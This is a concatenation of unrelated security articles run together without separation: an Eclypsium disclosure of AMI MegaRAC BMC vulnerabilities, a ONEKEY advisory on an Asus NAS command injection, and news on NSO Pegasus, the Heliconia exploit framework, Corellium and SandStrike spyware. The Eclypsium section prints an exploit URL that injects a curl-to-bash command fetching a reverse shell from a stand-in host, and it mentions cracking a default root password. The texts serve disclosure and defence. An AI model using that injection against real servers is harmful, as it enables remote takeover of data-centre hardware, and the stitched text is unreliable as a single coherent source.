AMI MegaRAC Redfish Arbitrary Code Execution

**BMC&C**

Eclypsium Research has discovered and reported 3 vulnerabilities in AMI MegaRAC Baseboard Management Controller (BMC) software. We are referring to these vulnerabilities collectively as BMC&C. MegaRAC BMC is widely used by many leading server manufacturers to provide “lights-out” management capabilities for their server products. Server manufacturers that are known to have used MegaRAC BMC include but are not limited to the following: 

AMD

Ampere Computing

ASRock

Asus

ARM

Dell EMC

Gigabyte

Hewlett-Packard Enterprise

Huawei

Inspur

Lenovo

NVidia

Qualcomm

Quanta

Tyan

The BMC&C vulnerabilities range in severity from Medium to Critical, including remote code execution and unauthorized device access with superuser permissions. The vulnerabilities can be exploited by remote attackers having access to remote management interfaces (Redfish, IPMI). Redfish is the successor to traditional IPMI and provides an API standard for the management of a server’s infrastructure and other infrastructure supporting modern data centers. Redfish is supported by virtually all major server and infrastructure vendors, as well as the OpenBMC firmware project.

These vulnerabilities pose a major risk to the technology supply chain that underlies cloud computing. In short, vulnerabilities in a component supplier affect many hardware vendors, which in turn can pass on to many cloud services. As such these vulnerabilities can pose a risk to servers and hardware that an organization owns directly as well as the hardware that supports the cloud services that they use.

BMCs are designed to provide administrators with near total and remote control over the servers they manage. AMI is a leading provider of BMCs and BMC firmware to a wide range of hardware vendors and cloud service providers. As a result, these vulnerabilities potentially affect a very large number of devices, and could enable attackers to gain control of or cause damage not only to devices but to data centers and cloud services

The vulnerabilities discovered are addressed by the following CVEs:

*   CVE-2022-40259 – Arbitrary Code Execution via Redfish API
*   CVE-2022-40242 – Default credentials for UID = 0 shell via SSH
*   CVE-2022-2827 – User enumeration via API

The impact of exploiting these vulnerabilities include remote control of compromised servers, remote deployment of malware, ransomware and firmware implants, and server physical damage (bricking). At this time, it is unknown whether these vulnerabilities are under active exploitation.

These risks are magnified by MegaRAC’s position as the world’s leading provider of BMC remote management firmware, sitting at the top of the BMC supply chain. This firmware is a foundational component of modern computing found in hundreds of thousands of servers in data centers, server farms, and cloud infrastructure around the world. And since devices in these environments typically standardize on a hardware configuration, a vulnerable configuration could likely be shared across thousands of devices. Additionally, some of this research was enabled by the discovery of a substantial amount of AMI intellectual property on the Internet. The availability of this information could naturally increase the likelihood of attacks in the wild. 

Eclypsium Research has been following a Coordinated Vulnerability Disclosure process, including AMI and other affected parties. Additionally, AMI and Eclypsium have reached out to multiple parties who are working to determine the scope of impacted products and services.

**About MegaRAC Baseboard Management Controllers (BMCs)**

Baseboard Management Controllers (BMCs) are powerful and privileged components that provide out-of-band management for modern servers. For all intents and purposes, a BMC is a fully functional independent computer within a server, equipped with its own independent power, firmware, memory, and networking stack. This allows remote administrators to control virtually everything on the device from low-level hardware settings to managing the host operating system, virtual hosts, applications, or data. The BMC can allow administrators to manage the host even when the host itself is powered off. 

The unique power and capabilities of BMCs make them particularly dangerous if compromised by attackers. Recently, attackers used BMC implants known as iLOBleed to attack data centers and completely wipe the disks of servers. Just as importantly, iLOBleed used the unique powers of firmware to do this repeatedly. Since the malicious code was hidden within the BMC firmware, the implant was able to persist even after the server operating system was reinstalled, enabling the attacker to repeat the cycle of destroying data after the server was recovered. Additionally, the implant took the added steps of silently preventing the system from updating the BMC firmware while spoofing results to make it appear that the firmware had been updated. While the iLOBleed implants are not directly related to the BMC&C vulnerabilities, they serve as a real-world example of the damage attackers can inflict on a large number of devices with access to their BMCs.

**A Fault Line in the Cloud Supply Chain**

To properly appreciate the scope of the BMC&C vulnerabilities, it is important to understand the role AMI MegaRAC plays in the supply chain of cloud data centers. Naturally, many enterprises are attracted to the cloud due to the ability to abstract computing resources from the cost and ongoing maintenance of physical hardware. However, clouds still ultimately run on hardware – and that translates to vast numbers of servers from many different vendors.

MegaRAC BMC firmware is one of the common threads that connects much of the hardware that underlies the cloud. As a result, any vulnerability in MegaRAC can easily spread through the extended supply chain to affect dozens of vendors and potentially millions of servers. Additionally, in order to abstract computing from the hardware, it is critical that the physical servers within a data center are interchangeable. To this end, cloud providers standardize on server components, hardware configurations, firmware & operating system versions, and hypervisor software. So if a vulnerable BMC is used in a data center environment, it is highly likely that hundreds or thousands of devices will share that same vulnerability. In the context of an attack, this could potentially put entire clouds at risk. 

**Discovery Process**

In August 2022, Eclypsium Research was made aware of a leak of intellectual property, purported to come from AMI, which had been posted online. After downloading and reviewing the data, it appeared legitimate, and since there was a chance others had accessed it the decision was made to look for vulnerabilities in case malicious actors were doing the same. The focus quickly narrowed down to the Redfish API, as it is remotely accessible and a first choice for attackers. 

**Vulnerability Details**

*   CVE-2022-40259 – Arbitrary Code Execution via Redfish API
*   CVE-2022-40242 – Default credentials for UID = 0 shell via SSH
*   CVE-2022-2827 – User enumeration via API

**BMC&C Attack Scenario****CVE-2022-40259 – Arbitrary Code Execution via Redfish API**

CVSS v3.1 Score : **9.9 Critical** (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

To find this issue, initially we reviewed for potentially dangerous calls such as command execution calls. We narrowed it down only to calls exposed to the user, and there was one sitting in the Redfish API implementation. The only complication is the attack sits in the path parameter, but it is not URL-decoded by the framework, so the exploit needs to be crafted specially to both be valid per URL and valid per bash shell command. The exploit looks roughly as follows (note that we have edited out a few details – like where it actually is – so as not to release a ready-made exploit for attackers):

http://<device>/super/secret/path;curl${IFS}domain.com|bash;

The path needs to be sent as-is in the HTTP request. domain.com needs to host a reverse shell (we will not be providing one, but it uses an available scripting language present on-board and is otherwise unremarkable). This exploit leads straight into a UID = 0 shell (UID = 0 user, confusingly, is called sysadmin), and does require the attacker to have a minimum access level on the device (Callback or up).

**CVE-2022-40242 – Default credentials for UID = 0 shell via SSH**

CVSS v3.1 Score : **8.3 High** (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)

As a second part for enumeration, we looked for available credentials in normal locations for a Linux system. We found a hash in /etc/shadow for the sysadmin user and managed to crack it. The password looked like a default, and we managed to find backreferences to it going as far back as 2014 by other people. Finding them is left as an exercise to the reader.

**CVE-2022-2827 – User enumeration via API**

CVSS v3.1 Score : **7.5 High** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

When making a request for a password reset, one of the parameters can be manipulated in such a way that it is possible to determine whether the user exists or not, with no prior knowledge other than the username itself. The vulnerability also allows an attacker to test for the presence of user accounts by iterating through a list of possible account names.

**Attack Scenarios**

The first two CVEs (CVE-2022-40259, CVE-2022-40242) lead straight into the UID = 0 administrative shell, with no further escalation necessary. CVE-2022-40259 requires prior access to at least a low-privilege account (Callback privileges or higher), while CVE-2022-40242 requires nothing more than remote access to the device, albeit on some devices this account may be disabled. The third vulnerability (CVE-2022-2827) would require additional steps for full exploitation; e.g. it allows for pinpointing pre-existing users and does not lead into a shell but would provide an attacker a list of targets for brute force or credential stuffing attacks.

These vulnerabilities can pose serious risks in any case in which an attacker has access to an affected server’s BMC. As a security best practice, BMCs should not be directly exposed to the Internet and scans performed after the initial disclosure indicate that public exposure is relatively low compared to recent high-profile vulnerabilities in other infrastructure products. However, it is quite common to find BMCs that are exposed due to either misconfigurations or poor security hygiene. Additionally, these vulnerabilities could be exploited by an attacker that has gained initial access into a data center or administrative network. As data centers tend to standardize on specific hardware platforms, any BMC-level vulnerability would most likely apply to large numbers of devices and could potentially affect an entire data center and the services that it delivers. Due to the nature and location of BMC vulnerabilities, detecting exploitation is complex as standard EDR & AV products focus on the operating system, not the underlying firmware. 

**Mitigations**

*   Ensure that all remote server management interfaces (e.g. Redfish, IPMI) and BMC subsystems in their environments are on their dedicated management networks and are not exposed externally, and ensure internal BMC interface access is restricted to administrative users with ACLs or firewalls.  
    
*   Review vendor default configurations of device firmware to identify and disable built-in administrative accounts and/or use remote authentication where available.  
    
*   Perform regular software and firmware updates in critical servers.  
    
*   Ensure that vulnerability assessments include remote server management subsystems (like MegaRAC, iDRAC, iLO, etc.) and critical firmware.  
    
*   Ensure that all critical firmware in servers is regularly monitored for indicators of compromise or unauthorized modifications.  
    
*   Perform supply chain checks of new equipment. Assess that all new servers have major vulnerabilities patched and the latest firmware updates installed.  
    
*   For Eclypsium customers, the platform will provide coverage of recently discovered vulnerabilities through a new functionality that will dynamically update scan results. 
*   Eclypsium has collaborated with Greynoise to provide detection signatures which will provide threat intelligence should any malicious actor begin indiscriminate exploitation attempts of CVE-2022-40259 or CVE-2022-2827.

**Conclusions**

Securing the firmware supply chain is a complex problem, and vulnerabilities found at the top of the chain present substantial risk due to the way OEMs integrate code into their products. Firmware vulnerabilities are non-trivial to remediate due the fact their location in the computing stack is not optimized for patching at scale. Furthermore, standardization of hosting & cloud providers on server components means these vulnerabilities can easily impact hundreds of thousands, possibly millions of systems. 

As attackers shift their focus from user facing operating systems to the lower level embedded code which hardware relies on, compromise becomes harder to detect and exponentially more complex to remediate. While compromise of a server OS can be resolved with a wipe & reinstallation, firmware compromise has the potential to remain beyond reinstallation and even more drastic measures like hard drive replacement. Security research into this area is imperative to stay a step ahead of the attacks and protect the foundation upon which modern computing relies on.

CVE-2022-40259: Supply Chain Vulnerabilities Put Server Ecosystem At Risk - Eclypsium

Journalists in El Salvador haul NSO Group to US court for illegal surveillance that ultimately compromised their safety.

Nearly two dozen journalists and other staffers working for El Faro, a digital newspaper based in El Salvador, are suing NSO Group for unleashing Pegasus spyware — malware they say was used to steal their most sensitive information, putting their safety in danger.

Along with ASO Group Technologies, its Israeli parent company, Q Cyber Technologies is also named as a defendant in the lawsuit.

The 22 plaintiffs from El Faro are getting an assist from the Knight First Amendment Institute at Columbia University in their litigation. Attorneys for the El Faro group say that because Apple servers in Silicon Valley were compromised by Pegasus to monitor the newsroom, they have filed the lawsuit in the US District Court in Northern California.

Pegasus spyware has a long history of being used by authoritarian governments to essentially take full control of devices of those they deem likely to stoke dissent. Once Pegasus is deployed, the complaint explains, the threat actor has control of the entire device, from downloading contacts and text messages to turning on the device microphone to listen to conversations in real time.

"They can activate the smartphone's camera to take photographs," the complaint added. "They can also copy authentication keys to gain access to cloud-based accounts."

Members of the news-gathering group at the influential Central American outlet claim they were targeted by the Salvadoran government while working on stories about human rights abuses and communicating with confidential sources, including the US Embassy, according to the court filing.

"The Pegasus attacks have profoundly disrupted Plaintiffs' lives and work," the Pegasus spyware suit claims. "The attacks have compromised Plaintiffs' safety as well as the safety of their colleagues, sources, and family members."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Newsroom Sues NSO Group for Pegasus Spyware Compromise

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Asus NAS-M25 allows an unauthenticated attacker to inject arbitrary OS commands via unsanitized cookie values.This issue affects NAS-M25: through 1.0.1.7.

**Introduction**

We recently deployed the first component of our “zero-day identification” module, which aimed at identifying vulnerability patterns in scripting languages. It’s been a long time coming and we want to share a few technical details about it with you.

Our objective is to support identification of vulnerability patterns in both scripting languages and compiled binaries. We started off with scripting languages as it seemed to be the easiest path to get results fast. Our first order of business was to identify the distribution of scripting languages within our corpus based off our file categorization. These statistics guided us in choosing which languages to support first.

 

Given what we observed, we chose to focus on two languages: Python and PHP. JavaScript is well represented too but it’s mostly observed in client-side web administration interfaces code, which is not that interesting to an attacker. Shell scripts and Lua code will probably be the next ones to be supported.

**Static Code Analysis**

To identify vulnerabilities, we perform taint analysis by reconstructing the abstract syntax tree and we then traverse this tree. With this approach, we can dramatically increase accuracy of the results and assure that user-controlled input is actually being processed in an insecure way, reducing the overall number of false-positives reported. At the moment, we look for the following vulnerability classes:

*   arbitrary command injection (CWE-77)
*   path traversal (CWE-23)
*   SQL injection (CWE-89)
*   insecure communications (CWE-319 / CWE-923)
*   weak cryptographic ciphers / hashing algorithms usage (CWE-327)
*   loose equality (CWE-697)
*   unsafe deserialization (CWE-502)

Before deploying the PHP static code analysis checker, we tested it with hundreds of selected sample firmware images and reviewed the results. This led to the discovery of around 15 critical bugs spanning 6 different vendors. All these bugs were reported to affected vendors and are in the process of being fixed.

Except this one.

This one is special because it affects a NAS device from Asus, which according to them “_has been EOL for years_“, with the latest firmware version dating back 10 years. Since there’s no fix in sight, we don’t have to wait for the 90 days and can publish the interesting details.

With this analysis module only being the first step and active research being conducted in the area of automated detection of potential 0-day vulnerabilities, you may expect a constant stream of technical advisories about bugs we already identified and ones we still have to uncover.

Now onto the advisory !

**Arbitrary Command Injection Through Cookies**

A command injection bug was identified during our scan campaign, so we downloaded the sample and validated the automated results manually.

**Affected vendor & product**

Asus M25 NAS

**Vendor Advisory**

NONE

**Vulnerable version**

All versions

**Fixed version**

None

**CVE IDs**

CVE-2022-4221

**Impact**

9.8 (Critical) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Credit**

Q. Kaiser, ONEKEY Research Lab  
Research supported by Certainity

This bug is probably the easiest one we had to deal with. As we can see in the screenshot below, a cookie value is used unsanitized in a call to exec(). By adding a semi-colon followed by any kind of arbitrary command, we can inject commands. The code is reachable unauthenticated.

 

The interesting part here is that Asus copied this file from AjaXplorer, an open-source project, but inserted the command injection bug by trying to add some authentication layer (code between “ALPHA_CUSTOMIZE” comment).

 

**Key Takeaways**

You may argue this vulnerability is very obvious and easy to find – and you are absolutely right. It is easy to find and it should have never ended up in production in the first place. Not 10 years ago and especially not today. But bugs like this are a steady companion when researching the security of embedded devices and underline the importance of shedding light into the supply-chain of your devices. This makes the security level of SBOM, device configuration, and also proprietary applications transparent – the only way to reliably determine your own security posture and cyber resilience.

**Timeline**

**2022-09-12** – Sent coordinated disclosure request to security@asus.com

**2022-09-13** – Asus answered “\[…\] since this model, NAS-M25 is end of life for years, we will not maintain its firmware and its security.”.

**2022-12-01** – ONEKEY release its advisory

CVE-2022-4221: ONEKEY identifies a command injection bug in the M25 NAS from Asus. Read the latest Security Advisory here👆

The framework has ties back to a Spanish exploit broker called Variston IT, and offers a one-stop shop for compromising Chrome, Defender and Firefox.

Google's Threat Analysis Group (TAG) has discovered a cyberattack framework dubbed Heliconia, built to exploit zero-day and n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender. It likely has connections to a gray-market spyware broker called Variston IT, which highlights how this shadowy segment is flourishing.

The Heliconia threat consists of three modules:

*   Heliconia Noise for compromising the Chrome browser, escaping the sandbox, and installing malware;
*   Heliconia Soft, a Web framework that deploys a PDF containing a Windows Defender exploit for CVE-2021-42298 that allows privilege escalation to SYSTEM and remote code execution (RCE);
*   And the Heliconia Files package which contains a fully documented Firefox exploit chain for Windows and Linux, including CVE-2022-26485 for RCE.

TAG became aware of the threat after receiving an anonymous submission to the Chrome bug reporting program. Upon further investigation, the Heliconia framework's source code was found to contain a script that points back to Variston IT, a Barcelona-headquartered entity that claims to provide "custom security solutions."

Commercial spyware is often sold by organizations claiming to be legitimate companies, for "use by law enforcement." However, mounting evidence shows that too often, these brokers don't vet their clients, "putting advanced surveillance capabilities in the hands of governments who use them to spy on journalists, human rights activists, political opposition and dissidents," according to a TAG posting on Wednesday.

Researchers noted that Variston IT is firmly in the middle of this proliferating market — a space that has seen sanctioning by the United States and others against organizations like the infamous NSO Group, creator of the Pegasus spyware.

"The commercial surveillance industry is thriving and has expanded significantly in recent years, creating risk for Internet users around the globe," TAG researchers added. "While surveillance technology may be legal under national or international laws, they are often used in harmful ways to conduct digital espionage against a range of groups."

So far, none of the modules has been seen in current attacks in the wild, but TAG researchers noted that they've likely been deployed in the past, including using the exploits they contain as zero-days before they were fixed.

Google TAG Warns on Emerging Heliconia Exploit Framework for RCE

After months of meticulous planning, investigators finally move in to catch AlphaBay’s mastermind red-handed. Then the case takes a tragic turn.

The Hunt for the Dark Web’s Biggest Kingpin, Part 5: Takedown

A 500-page document reviewed by WIRED shows that Corellium engaged with several controversial companies, including spyware maker NSO Group.

Corellium, a cybersecurity startup that sells phone-virtualization software for catching security bugs, offered or sold its tools to controversial government spyware and hacking-tool makers in Israel, the United Arab Emirates, and Russia, and to a cybersecurity firm with potential ties to the Chinese government, according to a leaked document reviewed by WIRED that contains internal company communications.

The 507-page document, apparently prepared by Apple with the goal of using it in the company’s 2019 copyright lawsuit against Corellium, shows that the security firm, whose software lets users perform security analysis using virtual versions of Apple’s iOS and Google’s Android, has dealt with companies that have a track record of selling their tools to repressive regimes and countries with poor human rights records.

According to the leaked document, Corellium in 2019 offered a trial of its product to NSO Group, whose customers have for years been caught using its Pegasus spyware against dissidents, journalists, and human rights defenders. Similarly, Corellium’s sales staff offered to provide a quote to purchase its software to DarkMatter, a now-shuttered cybersecurity company with ties with the UAE government that hired several former US intelligence members who reportedly helped it spy on human rights activists and journalists. 

In correspondence with WIRED, Corellium says NSO Group and Dark Matter had access to “a limited time/limited functionality trial version of Corellium's software” and that both were later denied requests to purchase the full version following its vetting process. 

For years Corellium has painted itself as a crucial defender against software bugs on Android and iOS. But the leaked document shows that Corellium worked with several companies that use bugs and exploits to hack into cell phones, as opposed to helping Google and Apple patch vulnerabilities.

The document includes emails between Corellium staff and customers or potential customers, including NSO Group and DarkMatter. The document is not public and is being reported on for the first time here. 

“As one of our early beta requesters, we’re delighted to extend you and your team at NSO Group an exclusive invitation to try Corellium, the world’s first and only mobile device virtualization platform. We think you’ll really enjoy the advanced mobile security research tools we have to offer,” reads a March 26, 2019, email between Correllium’s support staff and an NSO Group employee. “Your free trial will last until April 9. Trial accounts are limited, but if you need more time, or if you prefer to start your trial at a different time, just let us know.”

In the case of DarkMatter, the document includes an email exchange between a company employee and a Corellium sales email address. The emails are not dated, but they apparently reference a 2019 training on how to use the platform that Corellium offered potential customers at the cybersecurity conference Black Hat.

“I was a trainer at Blackhat last year where you guys had provided us access to the portal for a few days and I was very impressed with the amount of features it had,” the DarkMatter employee wrote. “We are interested in purchasing it. Can you guys provide us a quote for all the available options that you have?”

“We’re so glad to hear that you enjoyed using Corellium at Blackhat, and we actually have DarkMatter on our list of teams to reach out to regarding availability,” an unnamed Corellium employee responded. “We’d be more than happy to provide you a quote with all the options checked.”

Also in 2019, according to the document, Corellium sold its software to Paragon, a little-known company that has since been reported to be a provider of government surveillance technology. Corellium also licensed its software to a company called Pwnzen Infotech, whose founders were part of Pangu Team, a well-known Chinese group of elite iOS and iPhone hackers. A Pwnzen sales representative told Reuters in 2019, when Pwnzen was already a Corellium customer, that the company helped hack the phone of a person suspected of “subverting the government” in China. 

“There are a number of ties between Pwnzen and the People’s Republic of China’s government that are cause for concern,” says Dakota Cary, a consultant at Krebs Stamos Group who has written several reports about cybersecurity in China. “Bolstering Pwnzen’s hacking capabilities likely occurred at the detriment to US security interests,” he added, explaining that the company’s improved capabilities could have provided the Chinese government with better tools to hack targets inside and outside of the country, including the US.

Also, as of today, Corellium counts Russian iPhone hacking company Elcomsoft as a customer. And in 2019, Corellium sold to Elcomsoft’s Israeli competitor Cellebrite, a firm that helps law enforcement unlock iPhones and access the data stored within. Cellebrite has reportedly sold its phone-hacking products to countries such as China, Saudi Arabia, and Bahrain, among others. 

Corellium did not dispute the legitimacy of the document, but it also did not respond to a series of questions about its contents. Instead, Corellium CEO Amanda Gorton shared a draft of a blog post in which the company says it offered trials to NSO Group and DarkMatter but denied that the two companies became customers. 

“We’ve had opportunities to profit from these bad actors and have chosen not to,” the blog post reads. It further explains that Corellium restricts sales of its cloud product to “fewer than sixty countries” and has a “block list” of organizations.

Corellium didn’t specify the 60 countries, nor did it answer specific questions about Paragon, Pwnzen, Cellebrite, or Elcomsoft. The company wrote in the blog post that as the sales process goes on, the vetting gets “more intensive.” According to the blog post, that means Corellium asks about the customer’s use case, consults with “trusted contacts in the security community, including contacts at various US government agencies,” and looks at the potential customer’s online presence and investigates its “ownership, corporate structure, and employees.”

Apple did not respond to a request for comment, nor did NSO Group, Cellebrite, or Pwnzen. XiaBo Chen, who identifies as the founder of Pwnzen on LinkedIn, did not respond to multiple requests for comment. After the controversy surrounding DarkMatter’s role in targeting activists and journalists, the company reportedly rebranded to Digital14 in 2019, then to CPX in 2021. Digital14 and CPX did not respond to requests for comment.

Idan Nurick, the CEO and cofounder at Paragon, says that “as a matter of principle, Paragon maintains the confidentiality of its clients, as well as technology providers, and the company does not disclose any information pertaining to these entities.”

Vladimir Katalov, the CEO, cofounder, and co-owner of Elcomsoft, confirmed that his company is a Corellium customer. 

‘Puzzling’ Claims

The leaked document, prepared in 2021, according to an included timeline, mirrors Apple’s arguments against Corellium, which it accused of violating its copyright and the Digital Millennium Copyright Act by re-creating a virtual version of iOS. While Apple has never publicly presented the evidence that’s contained in the document against Corellium, the tech giant accused Corellium in its lawsuit of helping researchers develop zero-day exploits and spyware for governments around the world, hinting that this was one of the main reasons it didn’t approve of Corellium’s practices, apart from alleged copyright infringement.

“Although Corellium paints itself as providing a research tool for those trying to discover security vulnerabilities and other flaws in Apple’s software, Corellium’s true goal is profiting off its blatant infringement,” Apple said in the complaint. “Far from assisting in fixing vulnerabilities, Corellium encourages its users to sell any discovered information on the open market to the highest bidder.”

Corellium has forcefully defended itself against Apple’s claims, saying it sells to “well-known and well-respected financial institutions, government agencies, and security researchers” who use their product for legitimate purposes.

In December 2020, when he dismissed Apple’s copyright infringement claims, US District Judge Rodney Smith, of the Southern District of Florida, sided with Corellium, writing in the order on the parties’ motions for summary judgment that “Apple’s position is puzzling, if not disingenuous.”

“As for Apple’s contention that Corellium sells its product indiscriminately, that statement is belied by the evidence in the record that the company has a vetting process in place (even if not perfect) and, in the past, has exercised its discretion to withhold the Corellium Product from those it suspects may use the product for nefarious purposes,” the judge wrote. “Having reviewed the evidence, the Court does not find a lack of good faith and fair dealing.”

The case took an unexpected turn in August 2021, when Apple and Corellium settled out of court. (The terms of the deal were confidential.) Then, days later, the tech giant filed an appeal, keeping its case against Corellium alive.

Bad Reputations

Even in 2019, NSO Group and DarkMatter had poor reputations in the world of cybersecurity. At the time, there had already been several examples of abuse of NSO Group’s Pegasus spyware, particularly against journalists in Mexico. Ronald Deibert, the director of the Citizen Lab, a digital rights watchdog housed at the University of Toronto's Munk School that has investigated companies like NSO Group for years, said in March 2019 that there was a “mountain of evidence that NSO Group’s surveillance technology is being abused by its clients, and the company is either unwilling or unable to perform the type of due diligence to prevent that from happening.” 

Both Apple and Microsoft have called NSO Group “21st-century mercenaries.”

Gorton has publicly denied selling Corellium’s products to DarkMatter and NSO Group and said Corellium does not sell to companies in the Middle East.

“We have definitely rejected customers who have approached us. I’m sure you can imagine DarkMatter, NSO Group have all reached out and we just politely declined, we don’t sell to that region,” she said during a November 2021 interview with the _Decipher_ podcast. 

In the interview, she sold her company’s mission as positive and uncontroversial, saying that Corellium can be used to help researchers find bugs and report them to companies like Apple, something that companies like NSO Group, DarkMatter, Paragon, Pwnzen, Cellebrite, and Elcomsoft don’t do. Gorton added that hunting for security bugs is “kind of exactly what we wanted to see the platform used for.”

In the past, other Corellium executives and founders have repeatedly downplayed the possibility that bad actors could use its software. When asked whether he was worried that Corellium customers could use the product to find bugs and develop exploits that would then be used by governments, David Wang, one of the company’s cofounders, told _Forbes_ in 2018 that the company would be “selective in who we choose to do business with.” 

Wang did not respond to WIRED’s request for comment. 

In the podcast interview, Gorton has also fielded questions about how Corellium vets its customers to avoid selling to bad actors and that the company takes this process “very seriously,” selling only in the Asia-Pacific, European Union, and North America regions, and researching companies they don’t recognize. “We err on the side of caution,” she said.

The leaked document includes a 2021 email from Steve Dyer, the vice president of sales and business development at Corellium, to Gorton. In the email, Dyer explains the process for vetting “current and future cloud customers” as they submit requests for trials online. Part of the process, Dyer wrote, is to check that the companies are not from countries sanctioned by the US government, such as North Korea, Sudan, Syria, and Russia. (While Elcomsoft is headquartered in Russia, the company is not sanctioned by the US government.) 

“China has been added to the list for auto-denied trials,” Dyer wrote. 

Last year, the US government added NSO Group to a federal blocklist, preventing any US companies and individuals from doing business with the spyware company. In correspondence with WIRED, Corellium said it voluntarily refused to sell its software to NSO Group “more than two years before the United States Department of Commerce placed NSO Group on its Entity List.”

Nevertheless, Corellium’s engagement with these controversial companies may change the cybersecurity community’s view that Apple’s lawsuit is a case of an entitled tech giant going after a scrappy startup with an innovative product that it doesn’t like. 

John Scott-Railton, a senior researcher at the Citizen Lab, says the Corellium sales department’s outreach to NSO Group and DarkMatter is “a potentially cynical act” given the nature of those companies. “At that point, Corellium and everyone else knew exactly who NSO Group was and what they would do with that kind of technology and the people that would inevitably be harmed,” Scott-Railton says. “It raises questions about their ethics, their judgment, or both.”

Zach Edwards, an independent privacy and security researcher, says that “sensitive technology cannot be haphazardly sold to any company, in any country in the world.”

“While Corellium is a reverse-engineering tool that doesn't intrinsically create risks through its sale, the core purpose of the tool is to reverse malware,” Edwards says. “And if you sell the product to malware developers in countries averse to Western interests, we should assume that this tool will be used to improve malware.”

A person who tried Corellium in the past, who asked to remain anonymous because they were not allowed to speak to the press, says that “given what’s happening in the world today, you shouldn’t be dealing with Russian companies,” such as Elcomsoft. 

Elcomsoft’s CEO Katalov says that “the decision to work with a company based in Russia is a personal choice.”

“Please rest assured that we still strive to provide the best software and services, and trying to keep good relationships with our customers all over the world,” he adds. “We will just keep doing our job, making the world a safer place and battling the crime.”

Adrian Sanabria, a cybersecurity veteran, says that it’s not surprising that “groups interested in creating iOS exploits would be using a platform designed for iOS security research.” 

“For me, the core takeaway is that Apple created the need for platforms like Corellium by not providing the tools, access, and transparency the market needs and desires,” he says.

Danger Zones

Some of the organizations and companies linked to Corellium in the document come from countries seen as controversial by most people in the cybersecurity community in the West, including Alex Stamos, who acted as an expert witness for Corellium in the lawsuit against Apple.  

“I personally don’t believe it would be ethical to sell exploits to Saudi Arabia,” Stamos, the director of Stanford University’s Internet Observatory, said during testimony he provided in the lawsuit between Apple and Corellium, which is quoted in the document.  

Stamos also expressed doubts about selling products to the United Arab Emirates, whose government had a close relationship with DarkMatter. “The UAE has been shown to use malware and exploits to spy on journalists and suppress local dissent,” Stamos said. 

In response to the document’s revelations, Stamos says he doesn’t think “it's appropriate for Apple to use copyright law to try to stop security research, and I don't think it's responsible for Corellium to offer their product to companies known to create malicious software for authoritarian states.”

The document also includes the logos of alleged Corellium customers and companies linked to it. As well as the companies previously mentioned, the document includes the logo of Azimuth, a provider of advanced hacking tools to the intelligence and law enforcement agencies of the so-called Five Eyes. Other logos include the Centre for Strategic Infocomm Technologies of Singapore, or CSIT, as well as the logo of an academic institution in Saudi Arabia called the Center of Excellence in Information Assurance (COEIA), housed at the King Saud University. 

CSIT executives did not respond to a request for comment. Other than the logo of the COEIA, the document also shows a 2019 email titled “invitation to Corellium” sent to the organization. The COEIA did not respond to a request for comment.

The legal battle between Apple and Corellium is ongoing. Late last month, the two companies appeared at a hearing before the Eleventh Circuit of the US Court of Appeals in Florida. Apple’s lawyer, Melissa Sherry, argued that Corellium’s product is just a slightly tweaked version of iOS that’s not transformative enough not to be fair use. Corellium attorney Kevin Russell said the product helps users “shed light on the functionality of the Apple operating system” and is, therefore, fair use.

“I don't think there's a genuine dispute that the purpose of the product is to explore the unprotected functionality of the system's software,” he said. “What people do with that knowledge is the subject of another statute.”

A Leak Details Apple's Secret Dirt on Corellium, a Trusted Security Startup

"SandStrike," the latest example of espionage-aimed Android malware, relies on elaborate social media efforts and back-end infrastructure.

Adware and other unwanted and potentially risky applications continue to represent the biggest threat that users of mobile devices currently face. But that doesn't mean attackers aren't constantly trying to deploy other sophisticated mobile malware as well.

The latest example is "SandStrike," a booby-trapped VPN application for loading spyware on Android devices. The malware is designed to find and steal call logs, contact lists, and other sensitive data from infected devices; it can also track and monitor targeted users, Kaspersky said in a report this week.

The security vendor said its researchers had observed the operators of SandStrike attempting to deploy the sophisticated spyware on devices belonging to members of Iran's Baha'i community, a persecuted, Persian-speaking minority group. But the vendor did not disclose how many devices the threat actor might have targeted or succeeded in infecting. Kaspersky could not be immediately reached for comment.

**Elaborate Social Media Lures**

To lure users into downloading the weaponized app, the threat actors have established multiple Facebook and Instagram accounts, all of which purport to have more than 1,000 followers. The social media accounts are loaded with what Kaspersky described as attractive, religious-themed graphics designed to grab the attention of members of the targeted faith group. The accounts often also contain a link to a Telegram channel that offers a free VPN app for users wishing to access sites containing banned religious materials.

According to Kaspersky, the threat actors have even set up their own VPN infrastructure to make the app fully functional. But when a user downloads and uses SandStrike, it quietly collects and exfiltrates sensitive data associated with the owner of the infected device.

The campaign is just the latest in a growing list of espionage efforts involving advanced infrastructure and mobile spyware — an arena that includes well-known threats like NSO Group's notorious Pegasus spyware along with emerging problems like Hermit.

**Mobile Malware on the Rise**

The booby-trapped SandStrike VPN app is an example of the growing range of malware tools being deployed on mobile devices. Research that Proofpoint released earlier this year highlighted a 500% increase in mobile malware delivery attempts in Europe in the first quarter of this year. The increase followed a sharp decline in attack volumes toward the end of 2021.

The email security vendor found that many of the new malware tools are capable of a lot more than just credential stealing: "Recent detections have involved malware capable of recording telephone and non-telephone audio and video, tracking location and destroying or wiping content and data."

Google and Apple's official mobile app stores continue to be a popular mobile malware delivery vector. But threat actors are also increasingly using SMS-based phishing campaigns and social engineering scams of the sort seen in the SandStrike campaign to get users to install malware on their mobile devices.

Proofpoint also found that attackers are targeting Android devices far more heavily than iOS devices. One big reason is that iOS doesn't allow users to install an app via an unofficial third-party app store or to download it directly to the device, like Android does, Proofpoint said.

**Different Types of Mobile Malware in Circulation**

Proofpoint identified the most significant mobile malware threats as FluBot, TeaBot, TangleBot, MoqHao, and BRATA. The different capabilities integrated into these malware tools include data and credential theft, stealing funds from online accounts, and general spying and surveillance. One of these threats — FluBot — has been largely quiet since the disruption of its infrastructure in a coordinated law enforcement action in June.

Proofpoint found that mobile malware is not confined to a specific region or language. "Instead, threat actors adapt their campaigns to a variety of languages, regions and devices," the company warned.

